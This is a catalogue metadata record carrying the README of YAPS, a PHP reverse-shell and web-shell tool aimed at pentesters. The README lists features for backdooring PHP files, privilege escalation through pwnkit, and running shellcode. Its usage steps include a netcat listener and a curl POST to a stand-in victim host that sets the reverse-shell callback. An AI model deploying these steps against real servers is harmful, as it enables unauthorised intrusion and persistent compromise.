{"id":13844943,"url":"https://github.com/Nickguitar/YAPS","last_synced_at":"2025-07-12T00:32:21.457Z","repository":{"id":41825059,"uuid":"383318033","full_name":"Nickguitar/YAPS","owner":"Nickguitar","description":"Yet Another PHP Shell - The most complete PHP reverse shell","archived":false,"fork":false,"pushed_at":"2022-02-14T01:46:03.000Z","size":270,"stargazers_count":81,"open_issues_count":0,"forks_count":9,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-08-05T17:43:27.865Z","etag":null,"topics":["backdoor","bugbounty","ctf-tools","cve-2021-4034","exploit","hacking","netcat","netcat-reverse","penetration-testing","pentest","pentest-script","pentest-tool","pentesting","php","rat","reverse-shell","reverse-tcp","web-shell","webhacking"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Nickguitar.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-07-06T02:37:07.000Z","updated_at":"2024-08-03T11:17:32.000Z","dependencies_parsed_at":"2022-08-11T18:40:14.836Z","dependency_job_id":null,"html_url":"https://github.com/Nickguitar/YAPS","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Nickguitar%2FYAPS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Nickguitar%2FYAPS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Nickguitar%2FYAPS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Nickguitar%2FYAPS/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Nickguitar","download_url":"https://codeload.github.com/Nickguitar/YAPS/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225772819,"owners_count":17521895,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","bugbounty","ctf-tools","cve-2021-4034","exploit","hacking","netcat","netcat-reverse","penetration-testing","pentest","pentest-script","pentest-tool","pentesting","php","rat","reverse-shell","reverse-tcp","web-shell","webhacking"],"created_at":"2024-08-04T17:03:03.929Z","updated_at":"2024-11-21T17:31:01.926Z","avatar_url":"https://github.com/Nickguitar.png","language":"PHP","funding_links":[],"categories":["PHP"],"sub_categories":[],"readme":"# YAPS - **Y**et **A**nother **P**HP **S**hell\n\n![image](https://user-images.githubusercontent.com/3837916/152913972-59b182f7-aa98-4b48-bb60-16dfdcc02fc3.png)\n\n\nYes, as the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there, but with some advantages. It is a single PHP file containing all its functions and you can control it via a simple TCP listener (e.g. `nc -lp 1337`).\n\nIn the current version (1.5), its main functions support only linux systems, but i'm planning to make it work with Windows too.\n\nIt's currently in its first version and I haven't tested it much yet, and *there are still many things I intend to do and improve for the next versions (**it's not done yet!**)*, so please let me know if you've found any bugs or have some suggestion for feature or improvement. =)\n\n\n## Features\n* Single PHP file (no need to install packages, libs, or download tons of files)\n* Works with netcat, ncat, socat, multi/handler, almost any listener\n* Customizable password protection\n* No logs in .bash_history\n* Does some enumeration\n  * Network info (interfaces, iptables rules, active ports)\n  * User info\n  * List SUID and GUID files\n  *  Search for SSH keys (public and private)\n  *  List crontab\n  *  List writable PHP files\n* Auto download LinPEAS, LinEnum or Linux Exploit Suggester\n* Write and run PHP code on remote host\n* Spawn an interactive reverse shell\n* Duplicate as many connections as you want\n* Auto update\n* Infect PHP files with backdoors\n* Auto reverse root shell via pwnkit (CVE-2021-4034)\n* **[NEW] Send and execute shellcode**\n\n## Cons\n* Connection isn't encrypted (yet) (nc does not support SSL)\n* Not fully interactive (although you can spawn an interactive shell with `!interactive`)\n  * CTRL+C breaks it; can't use arrows to navigate (unless you use `rlwrap nc -lp \u003cip\u003e \u003cport\u003e`)\n\n## Usage\n1. Set up a TCP listener;\n2. Set your IP and port. This can be done by:\n* 2.1 Editing the variables at the start of the script;\n* 2.2 Setting them via post request (`curl -x POST -d \"x=ip:port\" victim.com/yaps.php`);\n3. Open yaps.php on browser, curl it or run via CLI;\n* 3.1 You can set `yaps.php?s` or `yaps.php?silent` to supress the banner\n* 3.2 You can run via CLI with `php yaps.php ip port`\n5. Hack!\n\n## Working commands\n* `!help - Display the help menu`\n* `!all-colors - Toggle all colors (compatible with colorless TTY)`\n* `!color - Toggle PS1 color (locally only, no environment variable is changed)`\n* `!duplicate - Spawn another YAPS connection`\n* `!enum - Download LinPEAS and LinEnum to /tmp and get them ready to use`\n* `!info - list informations about the target (the enumeration I mentioned above)`\n* `!infect - Infect writable PHP files with backdoors`\n* `!interactive - Spawn interactive reverse shells on other ports (works w/ sudo, su, mysql, etc.)`\n* `!passwd - Password option (enable, disable, set, modify)`\n* `!php - Write and run PHP on the remote host`\n* `!pwnkit - Tries to exploit CVE-2021-4034 and spawn a root revere shell`\n* `!shellcode - Send and run shellcode on the remote host`\n* `!suggester - Download Linux Exploit Suggester to /tmp and get it ready to use`\n\n## Screenshots\n\n\u003cdetails\u003e\n  \u003csummary\u003eClick to expand screenshots section\u003c/summary\u003e\n\n### Current commands:\n![commands](https://user-images.githubusercontent.com/3837916/153728054-82ab16ab-99b1-4113-863a-01f8fbeb6d04.png)\n\n### Doing some recon:\n![image](https://user-images.githubusercontent.com/3837916/127257433-778b1322-c82e-4857-897f-0f3f459dcb2b.png)\n\n### Root reverse shell through CVE-2021-4034\n![pwn](https://user-images.githubusercontent.com/3837916/152597200-267704b9-0d50-4bcd-a68f-3c8ea6c74c21.gif)\n \n### Sending and running shellcode!\n![shellcode](https://user-images.githubusercontent.com/3837916/153727126-a57c95a5-6447-4988-a57b-851b808df93e.gif)\n\n### Spawning a interactive shell\n![interactive](https://user-images.githubusercontent.com/3837916/153728966-ed70a9ff-29c4-435e-898f-6180df7ac048.gif)\n\n### Duplicating a YAPS session\n![duplicate](https://user-images.githubusercontent.com/3837916/153727468-dbbb6ef6-6461-4f2a-95dc-32940d797a39.gif)\n\n### Poisoning PHP files\n![infect](https://user-images.githubusercontent.com/3837916/127263363-e286357c-2be0-4890-8895-4bd5adadd3af.gif)\n\n### Writing remote PHP code\n![remotephp](https://user-images.githubusercontent.com/3837916/124774830-7dedab80-df14-11eb-9e84-c8d88b9f4de2.png)\n\n### Password protected shell\n![passprotected](https://user-images.githubusercontent.com/3837916/127260459-cc50203d-3ba6-408b-af0f-820756e9891d.png)\n\n\u003c/details\u003e\n\n\n## Changelog\n\n**v1.5 - 12/02/2022**\n- Added `!shellcode` to receive and run an arbitrary shellcode \n- Improved `duplicate()` function (you can now a range of ports)\n- Changed function name from `stabilize` to `interactive`\n- Packed embeded codes to save space\n- Fixed broken links\n- Prepend \"TERM=xterm\" to all commands\n- Minor improvements\n\n**v1.4 - 04/02/2022**\n- Added `!pwnkit` to exploit CVE-2021-4034 and spawn a root reverse shell\n- Improved `verify_update()` function\n- Minor improvements\n\n**v1.3.1 - 01/08/2021**\n- Bugs fixed\n\n**v1.3 - 28/07/2021**\n- Added `!infect` to infect PHP files with backdoors\n- Changed `!stabilize` payload (bugs fixed)\n\n**v1.2.2 - 18/07/2021**\n- Changed 'update' function\n- Changed 'connect' function\n- Improved 'download' function\n- Bugs fixed\n\n**v1.2.1 - 17/07/2021**\n- Bugs fixed\n\n**v1.2 - 17/07/2021**\n- Added `!duplicate` to spawn another shell\n- Added update verification (`--update|-u`)\n- Added CLI arguments (`--help|-h`)\n- Added socket via arguments (`php yaps.php ip port`)\n- Changed stabilize shell method (doesn't freeze anymore)\n- Changed download method\n- Changed connection method via POST (receives a single parameter)\n\n**v1.1 - 12/07/2021**\n- Added `!all-colors` to toggle terminal colors and work with colorless TTYs\n- Added `exit` command to close socket (leave shell)\n- Changed payload in `!stabilize` to unset HISTSIZE and HISTFILE\n- Changed the method of obtaining CPU and meminfo in `!info` \n\n**v1.0.1 - 08/07/2021**\n- Changed `[x,y,z]` to `array(x,y,z)` to improve compatibility with older PHP versions\n- Changed payload for interactive shell to work with PHP\u003c5.4\n\n## Credits\nSome ideas were inspired by this tools:\n\n#### Linpeas\nhttps://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS\n\n#### Linenum\nhttps://github.com/rebootuser/LinEnum\n\n#### Suggester\nhttps://github.com/AonCyberLabs/Windows-Exploit-Suggester\n\n#### Pentest Monkey\nhttps://github.com/pentestmonkey/php-reverse-shell\n\n####  Arthepsy exploit for pwnkit\nhttps://github.com/arthepsy/CVE-2021-4034/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNickguitar%2FYAPS","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FNickguitar%2FYAPS","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNickguitar%2FYAPS/lists"}